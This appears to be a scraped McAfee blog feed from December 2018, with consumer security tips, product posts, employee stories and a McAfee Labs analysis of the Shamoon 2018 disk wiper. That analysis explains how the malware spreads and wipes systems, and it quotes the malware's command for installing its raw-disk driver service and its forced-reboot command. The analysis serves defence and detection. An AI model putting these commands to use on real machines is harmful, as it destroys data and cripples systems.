Entering the workforce for the first time, the young professional is finally able to buy the gadgets that were once luxuries. They might have two phones; one for work and a personal device. Additionally, they are bringing more connected devices into their home, so the need for a secure home network has become obvious. They are also always on the go and having to connect to public Wi-Fi, so a Virtual Private Network (VPN) should be considered.

2032: The Concerned Parent

Fast forward almost ten years, the young professional has become a worrying parent. Their kids are spending too much time on screens. Having a way to monitor what they are doing on the internet and limit their time online is crucial, and an application that could  provide parental controls would be welcomed. Also, as they bring larger, more connected devices into the home, like smart refrigerators and thermostats, they are excited about a platform that will bake in security through a home network.

2038: The Brand Loyalists

The concerned parent has found devices they like and those they do not like. But more importantly, they have found brands they love, and they may continue to purchase from to bring the latest technology into their family’s lives. A comprehensive security system that covers all types of devices is exactly what they would need to keep a layer of protection

2045: The Unacquainted User

At this point in a digital journey, our user has stopped keeping up with trends because things have changed so much. Almost to the point where they are unwilling to learn new tech, or are untrusting of it all together. But the need to maintain their security and privacy is still top of mind –especially as cybercriminals often prey on this demographic due to being an easy target. A person like this might worry about ransomware, viruses, and identity theft along with protecting their home network.

As you can see, a person’s security and safety needs, desires, and even their devices evolve depending on the moment in which they are within their life. With so much in flux, the last thing anyone wants to think about is security – but with constantly changing technology at an all-time high, it’s safe to bet that threats will evolve to keep pace, and so should the ways in which we protect devices. For these reasons, it’s important to leverage a security partner that will keep this in mind, and will grow with not only our evolving needs, but evolving technology, too.

To learn more about consumer security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post What CES Can Show Us About Evolving Consumer Security Needs: A Timeline appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/ces-evolving-security-needs-a-digital-life-timeline/feed/ 0
Ghosts of Botnets Past, Present, and Future https://securingtomorrow.mcafee.com/consumer/ghosts-of-botnets-past-present-and-future/ https://securingtomorrow.mcafee.com/consumer/ghosts-of-botnets-past-present-and-future/#respond Mon, 17 Dec 2018 22:49:28 +0000 https://securingtomorrow.mcafee.com/?p=93244

‘Twas the morning of October 21st, and all through the house many IoT devices were stirring, including a connected mouse. Of course, this wasn’t the night before Christmas, but rather the morning of Dyn — the 2016 DDoS attack on the service provider that took the entire East Coast offline for a few hours. The […]

The post Ghosts of Botnets Past, Present, and Future appeared first on McAfee Blogs.

]]>

‘Twas the morning of October 21st, and all through the house many IoT devices were stirring, including a connected mouse. Of course, this wasn’t the night before Christmas, but rather the morning of Dyn — the 2016 DDoS attack on the service provider that took the entire East Coast offline for a few hours. The root of the attack: botnets, AKA unsecured IoT devices that were enslaved by Mirai malware. And though this attack made history back in 2016, botnet attacks and the manipulation of vulnerable IoT devices have shown no signs of slowing since. To explore how these attacks have evolved over time, let’s examine the past, present, and future of botnets.

The Past

Any internet-connected device could potentially become a botnet. A botnet is an aggregation of connected devices, which could include computers, mobile devices, IoT devices, and more that have been infected and thereby under the control of one malware variant. The owners of these devices are typically unaware their technology has been infected and thereby under the control of the malware author.

This infection and enslavement process came to a powerful fruition on that fateful October morning, as thousands of devices were manipulated by Mirai malware and transformed into botnets for cybercriminals’ malicious scheme. Cybercriminals used this botnet army to construct one of the largest DDoS attacks in recent history on DNS provider Dyn, which temporarily knocked major sites such as Twitter, Github, and Etsy offline.

The Present

Now, the Dyn attack is arguably one of the most infamous in all of security history. But that doesn’t mean the attacks stop there. Fast forward to 2018, and botnets are still just as prominent, if not more. Earlier in the year, we saw Satori emerge, which even borrowed code from Mirai, as well as Hide N Seek (HNS), which has managed to build itself up to 24,000 bots since January 10th.

What’s more — DDoS attacks, which are largely driven by botnets, have also showed no signs of slowing this year. Just take the recent WordPress attack for example, which actually involved an army of over 20,000 botnets attacking sites across the web.

The Future

Botnets don’t just have a past and present — they likely have a future as well. That’s because cybercriminals favor the potency of this ‘infect and enslave’ tactic, so much so that they’re trying to spread it far and wide. Turns out, according to one report, you can even rent an IoT botnet, as one Dark Web advertisement displayed a 50,000-device botnet for rent for a two-week duration to conduct one-hour attacks a rate of $3000 – $4000.

The good news is — the cybersecurity industry is preparing for the future of botnet attacks as well. In fact, we’ve engineered technology designed to fight back against the nature of insecure IoT devices — such as our Secure Home Platform solution.

However, a lot of the botnet attacks can be stopped by users themselves if they implement strong security practices from start. This means changing the default passwords on any new IoT device you get, keeping any and all software up-to-date, always using a firewall to detect unusual behavior, and implementing comprehensive security software to ensure that all your computers and devices have protection.

If users everywhere implement the right processes and products from the start, botnet attacks may eventually become a thing of the past, and won’t ever be part of the present again.

To learn more about IoT device security and our approach to it, be sure to follow us at @McAfee and @McAfee_Home.

The post Ghosts of Botnets Past, Present, and Future appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/ghosts-of-botnets-past-present-and-future/feed/ 0
The Year That Was – Cybersecurity Takeaways From 2018 https://securingtomorrow.mcafee.com/consumer/the-year-that-was-cybersecurity-takeaways-from-2018/ https://securingtomorrow.mcafee.com/consumer/the-year-that-was-cybersecurity-takeaways-from-2018/#respond Mon, 17 Dec 2018 18:22:21 +0000 https://securingtomorrow.mcafee.com/?p=93240 So, what was 2018 like for you? Just another year, a whirlwind of happiness and heartbreaks, or a momentous one that will stay in your memory forever? In the cyberworld, a lot has happened this year. There were data breaches and bitcoin mining; social media platform hacks and spread of fake news; mass campaigns online […]

The post The Year That Was – Cybersecurity Takeaways From 2018 appeared first on McAfee Blogs.

]]>
So, what was 2018 like for you? Just another year, a whirlwind of happiness and heartbreaks, or a momentous one that will stay in your memory forever? In the cyberworld, a lot has happened this year. There were data breaches and bitcoin mining; social media platform hacks and spread of fake news; mass campaigns online and bank/ATM hacks. An eventful year, wouldn’t you say?

As governments around the world are exploring tightening their cyber security laws, security vendors are working on creating better and stronger tools to keep us safe online. Let’s take a quick look at the major security breaches that occurred over the year. In hindsight, we can understand better where we are failing and what steps we, the consumers, can take to protect our data and identity.

There have been such rampant phishing and data mining attacks, that even those who do not keep up with technology have now started feeling the heat of it. For example, when a large bank’s server was attacked, or the SIM card swipe fraud was uncovered, there was chaos everywhere.

Time to recapitulate the attacks that matter most to us, the consumers:

  1. Bank and ATM system hacks
  2. Phishing attacks: via email and social media platforms
  3. DDoS botnet attack: These attacks were mainly targeted at gaming sites and government websites, severely slowing down operation
  4. Hacking of customer bases: We have noted several significant data breaches over the year and it has become a major concern for the govt, industries and security firms.
  5. IoT attacks: Smart devices are the latest tech additions to our homes but when these are compromised, it may lead to the compromise of all connected devices. Users should adopt care while downloading apps because malicious apps can be used to corrupt, or control connected devices at home
  6. Public Wi-Fi: Using public Wi-Fi to transmit sensitive information or for carrying out financial transactions, expose users to hacking and data theft
  7. Hacking of social media platforms: As most of us are now signed on to some or the other popular social media platforms, we need to be extra careful about our data privacy and how much information we are sharing online.

As India remains vulnerable for Web Application Attacks, we need to gear up and maximize our security in the virtual space. Not only do we need to follow traditional security measures but also need to address new sources of threat like ATM hacks, Crypto mining and control of home IoT devices by cyber criminals. Awareness is key for an aware user to know about new threats and ways to combat them.

Sharing some safety tips to see you securely through the next year:

  • Monitor Digital Assistants – Prevent your digital assistants from becoming attack portals for cyber criminals. Limit the extent of control they have over other devices, if you can. Ensure your home router default password is changed and you update your software regularly, to patch any security vulnerabilities
  • Password is the key – The safety of your online accounts depends a lot on strong and unique passwords, that are a mix of upper case, lower case, symbols and are at least 12 characters long. Better still, opt for a well-known password manager.
  • Be Mindful – Always research and review apps before downloading. The same goes for new websites, or e-payment gateways. Further, download mobile apps only from genuine stores, like Google Play and Apple’s App Store, for they continually check and take down suspicious apps
  • Secure all your devices – Use a comprehensive security tool to scan content before downloading and send suspicious messages into the spam folder
  • Stay Informed – Stay on top of the latest in cybersecurity by following my blog and @McAfee_Home on Twitter. Don’t forget to listen to our podcast Hackable?

 

Ciao folks! See you in 2019.

Source Credits:

https://securingtomorrow.mcafee.com/consumer/mobile-and-iot-security/zombie-iot-botnets/

 

The post The Year That Was – Cybersecurity Takeaways From 2018 appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/the-year-that-was-cybersecurity-takeaways-from-2018/feed/ 0
Can Hackers Make Drones Drop out of the Sky? https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/can-hackers-make-drones-drop-out-of-the-sky/ https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/can-hackers-make-drones-drop-out-of-the-sky/#respond Mon, 17 Dec 2018 17:00:56 +0000 https://securingtomorrow.mcafee.com/?p=93107

While Amazon hasn’t begun using autonomous drones to deliver packages (yet), the aerial technology is becoming more and more popular. Hobbyists, racers, photographers, and even police departments have registered more than 1 million drones with the FAA. But is the emerging technology secure?  In the latest episode of “Hackable?”, host Geoff Siskind travels to Johns […]

The post Can Hackers Make Drones Drop out of the Sky? appeared first on McAfee Blogs.

]]>

While Amazon hasn’t begun using autonomous drones to deliver packages (yet), the aerial technology is becoming more and more popular. Hobbyists, racers, photographers, and even police departments have registered more than 1 million drones with the FAA. But is the emerging technology secure? 

In the latest episode of “Hackable?”, host Geoff Siskind travels to Johns Hopkins University to investigate. Listen as Geoff flies three different drones while researchers bombard them with cyber attacks. Learn if hackers can make drones drop out of the sky! 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this high-flying episode.  

 


The post Can Hackers Make Drones Drop out of the Sky? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/trusted-advisor/can-hackers-make-drones-drop-out-of-the-sky/feed/ 0
Can Hackers Make Drones Drop out of the Sky? https://securingtomorrow.mcafee.com/consumer/can-hackers-make-drones-drop-out-of-the-sky-2/ https://securingtomorrow.mcafee.com/consumer/can-hackers-make-drones-drop-out-of-the-sky-2/#respond Mon, 17 Dec 2018 17:00:08 +0000 https://securingtomorrow.mcafee.com/?p=93110

While Amazon hasn’t begun using autonomous drones to deliver packages (yet), the aerial technology is becoming more and more popular. Hobbyists, racers, photographers, and even police departments have registered more than 1 million drones with the FAA. But is the emerging technology secure?  In the latest episode of “Hackable?”, host Geoff Siskind travels to Johns […]

The post Can Hackers Make Drones Drop out of the Sky? appeared first on McAfee Blogs.

]]>

While Amazon hasn’t begun using autonomous drones to deliver packages (yet), the aerial technology is becoming more and more popular. Hobbyists, racers, photographers, and even police departments have registered more than 1 million drones with the FAA. But is the emerging technology secure? 

In the latest episode of “Hackable?”, host Geoff Siskind travels to Johns Hopkins University to investigate. Listen as Geoff flies three different drones while researchers bombard them with cyber attacks. Learn if hackers can make drones drop out of the sky! 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this high-flying episode.  

 


The post Can Hackers Make Drones Drop out of the Sky? appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/can-hackers-make-drones-drop-out-of-the-sky-2/feed/ 0
McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries https://securingtomorrow.mcafee.com/business/security-operations/mcafee-advanced-threat-defense-incorporates-the-mitre-attck-framework-to-help-you-get-the-play-by-play-narrative-on-adversaries/ https://securingtomorrow.mcafee.com/business/security-operations/mcafee-advanced-threat-defense-incorporates-the-mitre-attck-framework-to-help-you-get-the-play-by-play-narrative-on-adversaries/#respond Mon, 17 Dec 2018 14:00:29 +0000 https://securingtomorrow.mcafee.com/?p=93104

In the cybersecurity space, there’s a lot of talk about the “attacker advantage.” As a defender, you’re all too familiar with the concept. Every day, you and your team try to gain ground over adversaries who seem to get the jump on your defenses by exploiting the latest points of vulnerability. Gaining a better understanding […]

The post McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries appeared first on McAfee Blogs.

]]>

In the cybersecurity space, there’s a lot of talk about the “attacker advantage.” As a defender, you’re all too familiar with the concept. Every day, you and your team try to gain ground over adversaries who seem to get the jump on your defenses by exploiting the latest points of vulnerability. Gaining a better understanding of your adversaries and their work through the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) framework can help bolster your defenses. Available to everyone at no cost, ATT&CK is a shared knowledgebase of information about the techniques, tactics, and processes (TTPs) used in real-world campaigns.

What’s great about ATT&CK is that it not only gets into the details about how cybercriminals mastermind actual attacks, it also helps you strategize your defenses, align your security priorities, and make crucial adjustments to your arsenal. Ultimately, it helps you detect and respond more quickly and effectively when adversaries strike.

Additionally, since ATT&CK has been incorporated into security certification training courses, your junior analysts can upgrade their skill set. By gaining familiarity with the way adversaries act, your analysts can hone their threat-hunting abilities.

Another advantage is that everyone across your entire organization can speak the same language when communicating about security. The ATT&CK framework is a jargon-free zone. As a security professional, you can impart information to your peers and other stakeholders in ordinary, everyday language.

In close collaboration with the MITRE community, McAfee recognizes the value of the ATT&CK framework. With the latest release of McAfee Advanced Threat Defense, our advanced sandboxing analytics solution, we have mapped the ATT&CK framework directly to the reporting feature. McAfee Advanced Threat Defense offers a wide spectrum of easy-to-read, detailed reporting options—from summary reports for action prioritization to mapping results to the ATT&CK framework to analyst-grade malware data. We’ve made it really easy for analysts to quickly switch from identified TTPs in the McAfee Advanced Threat Defense MITRE ATT&CK report to the ATT&CK framework itself for a deeper dive into the specifics of any given attack or identified adversaries.

Apart from the all-important benefit of accelerating detection and response, incorporating the ATT&CK framework also helps analysts demystify their results when communicating with management and the executive team. When everyone uses a common framework to describe the realities of their risk, the whole organization can benefit by reaching consensus about security priorities.

To learn more about McAfee Advanced Threat Defense and the MITRE ATT&CK framework, check out these resources:

MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation.

McAfee and the McAfee logo are trademarks or registered trademarks of McAfee, LLC or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others. Copyright ©2018 McAfee, LLC

The post McAfee Advanced Threat Defense Incorporates the MITRE ATT&CK Framework to Help You Get the Play-by-Play Narrative on Adversaries appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/business/security-operations/mcafee-advanced-threat-defense-incorporates-the-mitre-attck-framework-to-help-you-get-the-play-by-play-narrative-on-adversaries/feed/ 0
Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online https://securingtomorrow.mcafee.com/consumer/family-safety/holiday-rush-how-to-check-yourself-before-your-wreck-yourself-when-shopping-online/ https://securingtomorrow.mcafee.com/consumer/family-safety/holiday-rush-how-to-check-yourself-before-your-wreck-yourself-when-shopping-online/#respond Sat, 15 Dec 2018 15:00:38 +0000 https://securingtomorrow.mcafee.com/?p=93085

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year. After fighting the crowds and scouring the stores to no avail, […]

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

]]>

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/consumer/family-safety/holiday-rush-how-to-check-yourself-before-your-wreck-yourself-when-shopping-online/feed/ 0
Shamoon Returns to Wipe Systems in Middle East, Europe https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/ https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/#respond Fri, 14 Dec 2018 20:32:41 +0000 https://securingtomorrow.mcafee.com/?p=93157

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims. Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can […]

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

]]>

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims.

Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can take weeks or months, while resulting in unprofitability and diminished reputation.

Recent attacks have demonstrated how big the damage can be. Last year NotPetya affected several companies around the world. Last February, researchers uncovered OlympicDestroyer, which affected the Olympic Games organization.

Shamoon is destructive malware that McAfee has been monitoring since its appearance. The most recent wave struck early this month when the McAfee Foundstone Emergency Incident Response team reacted to a customer’s breach and identified the latest variant. Shamoon hit oil and gas companies in the Middle East in 2012 and resurfaced in 2016 targeting the same industry. This threat is critical for businesses; we recommend taking appropriate actions to defend your organizations.

During the past week, we have observed a new variant attacking several sectors, including oil, gas, energy, telecom, and government organizations in the Middle East and southern Europe.

Similar to the previous wave, Shamoon Version 3 uses several mechanisms as evasion techniques to bypass security as well to circumvent analysis and achieve its ends. However, its overall behavior remains the same as in previous versions, rendering detection straightforward for most antimalware engines.

As in previous variants, Shamoon Version 3 installs a malicious service that runs the wiper component. Once the wiper is running, it overwrites all files with random rubbish and triggers a reboot, resulting in a “blue screen of death” or a driver error and making the system inoperable. The variant can also enumerate the local network, but in this case does nothing with that information. This variant has some bugs, suggesting the possibility that this version is a beta or test phase.

The main differences from earlier versions are the name list used to drop the malicious file and the fabricated service name MaintenaceSrv (with “maintenance” misspelled). The wiping component has also been designed to target all files on the system with these options:

  • Overwrite file with garbage data (used in this version and the samples we analyzed)
  • Overwrite with a file (used in Shamoon Versions 1 and 2)
  • Encrypt the files and master boot record (not used in this version)

Shamoon is modular malware: The wiper component can be reused as a standalone file and weaponized in other attacks, making this threat a high risk. The post presents our findings, including a detailed analysis and indicators of compromise.

Analysis

Shamoon is a dropper that carries three resources. The dropper is responsible for collecting data as well as embedding evasion techniques such as obfuscation, antidebugging, or antiforensic tricks. The dropper requires an argument to run.

It decrypts the three resources and installs them on the system in the %System% folder. It also creates the service MaintenaceSrv, which runs the wiper. The typo in the service name eases detection.

The Advanced Threat Research team has watched this service evolve over the years. The following tables highlight the differences:


The wiper uses ElRawDisk.sys to access the user’s raw disk and overwrites all data in all folders and disk sectors, causing a critical state of the infected machine before it finally reboots.

The result is either a blue screen or driver error that renders the machine unusable.

Overview

Dropper

Executable summary

The dropper contains other malicious components masked as encrypted files embedded in PE section.

These resources are decrypted by the dropper and contain:

  • MNU: The communication module
  • LNG: The wiper component
  • PIC: The 64-bit version of the dropper

Shamoon 2018 needs an argument to run and infect machines. It decrypts several strings in memory that gather information on the system and determine whether to drop the 32-bit or 64-bit version.

It also drops the file key8854321.pub (MD5: 41f8cd9ac3fb6b1771177e5770537518) in the folder c:\Windows\Temp\key8854321.pub.

The malware decrypts two files used later:

  • C:\Windows\inf\mdmnis5tQ1.pnf
  • C:\Windows\inf\averbh_noav.pnf

Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy.

The malware checks whether the following shares exist to copy itself and spread:

  • ADMIN$
  • C$\WINDOWS
  • D$\WINDOWS
  • E$\WINDOWS

Shamoon queries the service to retrieve specific information related to the LocalService account.

It then retrieves the resources within the PE file to drop the components. Finding the location of the resource:

Shamoon creates the file and sets the time to August 2012 as an antiforensic trick. It puts this date on any file it can destroy.

The modification time can be used as an antiforensic trick to bypass detection based on the timeline, for example. We also observed that in some cases the date is briefly modified on the system, faking the date of each file. The files dropped on the system are stored in C:\\Windows\System32\.

Before creating the malicious service, Shamoon elevates its privilege by impersonating the token. It first uses LogonUser and ImpersonateLoggedOnUser, then ImpersonateNamedPipeClient. Metasploit uses a similar technique to elevate privileges.

Elevating privileges is critical for malware to perform additional system modifications, which are usually restricted.

Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10):

If the service is already created, it changes the configuration parameter of the service with the previous configuration.

It finally finishes creating MaintenaceSrv:

The wiper dropped on the system can have any one of the following names:

 

 

Next the wiper runs to destroy the data.

Wiper

The wiper component is dropped into the System32 folder. It takes one parameter to run. The wiper driver is embedded in its resources.

We can see the encrypted resources, 101, in this screenshot:

The resource decrypted is the driver ElRawDisk.sys, which wipes the disk.

Extracting the resource:

This preceding file is not malicious but is considered risky because it is the original driver.

The wiper creates a service to run the driver with the following command:

sc create hdv_725x type= kernel start= demand binpath= WINDOWS\hdv_725x.sys 2>&1 >nul

 

The following screenshot shows the execution of this command:

 

The malware overwrites every file in c:\Windows\System32, placing the machine in a critical state. All the files on the system are overwritten.

The overwriting process:

Finally, it forces the reboot with the following command:

Shutdown -r -f -t 2

 

Once the system is rebooted it shows a blue screen:

Worm

The worm component is extracted from the resources from the dropper. Destructive malware usually uses spreading techniques to infect machines as quickly as possible.

The worm component can take the following names:

We noticed the capability to scan for the local network and connect to a potential control server:

Although the worm component can spread the dropper and connect to a remote server, the component was not used in this version.

Conclusion

Aside from the major destruction this malware can cause, the wiper component can be used independently from the dropper. The wiper does not have to rely on the main stub process. The 2018 Shamoon variant’s functionality indicates modular development. This enables the wiper to be used by malware droppers other than Shamoon.

Shamoon is showing signs of evolution; however, these advancements did not escape detection by McAfee DATs. We expect to see additional attacks in the Middle East (and beyond) by these adversaries. We will continue to monitor our telemetry and will update this analysis as we learn more.

MITRE ATT&CK™ matrix

Indicators of compromise

df177772518a8fcedbbc805ceed8daecc0f42fed                    Original dropper x86
ceb7876c01c75673699c74ff7fac64a5ca0e67a1                    Wiper
10411f07640edcaa6104f078af09e2543aa0ca07                   Worm module
43ed9c1309d8bb14bd62b016a5c34a2adbe45943               key8854321.pub
bf3e0bc893859563811e9a481fde84fe7ecd0684                  RawDisk driver

 

McAfee detection

  • Trojan-Wiper!DE07C4AC94A5
  • RDN/Generic.dx
  • Trojan-Wiper

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/feed/ 0
Why I Bring My Authentic Self to Work at McAfee https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/why-i-bring-my-authentic-self-to-work-at-mcafee/ https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/why-i-bring-my-authentic-self-to-work-at-mcafee/#respond Fri, 14 Dec 2018 17:16:44 +0000 https://securingtomorrow.mcafee.com/?p=93119

By Kristol, Sales Account Manager and President, McAfee African Heritage Community If you talked to me when I first started working at McAfee, I wouldn’t have believed you if you told me that I’d still be working here 16 years later. But I am still working here, and I’ve grown from every challenge and success […]

The post Why I Bring My Authentic Self to Work at McAfee appeared first on McAfee Blogs.

]]>

By Kristol, Sales Account Manager and President, McAfee African Heritage Community

If you talked to me when I first started working at McAfee, I wouldn’t have believed you if you told me that I’d still be working here 16 years later. But I am still working here, and I’ve grown from every challenge and success in my cybersecurity journey. Most of all, I’m thankful to work for an employee-first company.

When I walk through our Plano office doors, it’s like walking into my second home. At my desk, I even have my own as-seen-on-TV “Snuggie” blanket in case I get cold while I’m working.

Early in my career at McAfee, I formed an immediate bond with my new teammates in operations. It was clear to me that they would soon become family. Over the years, we have shared milestones, marriages, births, and burials. And as I’ve moved role to role internally at McAfee, I’ve noticed a trend: these wonderful working relationships have continued. My experience has remained consistent as I’ve moved between departments: from operations to finance and sales.

During my tenure, I have experienced a transition from a married woman with a five-year-old daughter and three-year-old son, to a divorcée who is approaching an “empty nesting” season of life. My transition has brought challenging personal experiences—and McAfee was the only constant in my life. Work/life balance as a single mother was critical to my personal and professional success. McAfee’s leadership approach has always been sensitive—not only to what’s best for the bottom line, but what’s best for the employee.

 

Culture and Office Camaraderie

One of my favorite parts about working at McAfee is the fun culture! In the last 16 years, I have had seven different roles—each with new challenges and skillsets to prepare me for the next level. It has been one adventurous ride—from recording a sales kick-off video meeting, to dress-up shenanigans, to singing “Proud Mary” at a Christmas event (and winning!).

10 years ago, I started a Holiday Candle Exchange party with the women here in our Plano office.  My goal was to put names to faces, network with other women at McAfee and of course, get a great candle for the season! The event started with four to six women and has grown to over 20 women annually. This is one of McAfee’s best attributes, the ability to innovate without fear and cultivate an inclusive culture—right where you are!

Becoming a Leader in the African Heritage Community

In 2017, I proudly accepted the appointment to become the President of the African Heritage Community, one of our diversity and inclusion chapters at McAfee. It’s been an honor to be a part of an organization that celebrates diversity while fostering inclusion and professional growth. The MAHC chapter is led by talented individuals from different business units across the company—like human resources, training, support, and operations.

Our organization is focused on staying connected, cultivating our organization, and committed to professional and personal growth—while centering ourselves within the community.

How McAfee Has Supported My Development

I have truly been blessed to be an employee at McAfee. I work with teammates, managers, and executives that push me to be a better version of myself every single day. They challenge my way of thinking and motivate me to look beyond the present. To prepare for unknown surprises. To accept defeat and learn from it. To be confident in my decisions and trust myself. To never stop learning, believing and dreaming!

This is my life at McAfee…and it’s a wonderful life!

 

 

For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about. Interested in joining our teams? We’re hiring! Apply now!

The post Why I Bring My Authentic Self to Work at McAfee appeared first on McAfee Blogs.

]]>
https://securingtomorrow.mcafee.com/other-blogs/life-at-mcafee/why-i-bring-my-authentic-self-to-work-at-mcafee/feed/ 0
McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/ https://securingtomorrow.mcafee.com/business/mcafee-india-hosts-nasscoms-cyber-security-gurukul-an-exclusive-initiative-for-women-professionals/#respond Thu, 13 Dec 2018 21:28:59 +0000 https://securingtomorrow.mcafee.com/?p=93095

The Cyber Security Gurukul Series is an initiative by the ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for Women professionals in Core Technologies by noted industry body NASSCOM. Focused specifically on the IT-ITES/BPM, Product and R&D Firms, the key aim of this initiative is to enable women with deeper knowledge various technologies […]

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

]]>

The Cyber Security Gurukul Series is an initiative by the ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for Women professionals in Core Technologies by noted industry body NASSCOM. Focused specifically on the IT-ITES/BPM, Product and R&D Firms, the key aim of this initiative is to enable women with deeper knowledge various technologies and thereby nurture them as leaders for tomorrow. It is an initiative McAfee is proud to partake in, which is why on December 4th, McAfee India hosted close to 40 female professionals from many organizations, including McAfee, as a part of NASSCOM’s Cybersecurity Gurukul series.

The half a day session started with a keynote from Venkat Krishnapur, VP Engineering & Managing Director, McAfee India. Addressing the group on “Countering Emerging Threats by Building Security DNA of your Organization”, the session discussed how the exponential growth of connected devices over the past few years has made organizations and individuals prone to cyberattacks more than ever before. Venkat also covered other key topics, such as the increase in the number of cyberattacks, variety and evolution of malware, importance of cloud security in today’s day and age, and how security organizations such as McAfee invest in both technology and people

Following Venkat’s keynote session, Sandeep Kumar Singh, Security Researcher and SSA Lead, McAfee India, hosted a two-hour session for the attendees. The session touched upon various facets of “Introduction to Security Deployment Lifecycle” why it’s imperative for organizations to invest in SDL, the key ingredients of a successful security program, and a walkthrough of key SDL activities. Sandeep also spoke to the group about how choosing a career in cybersecurity will give them a competitive edge, as a shortage of professionals in this field remains a critical vulnerability for organizations and nations alike.

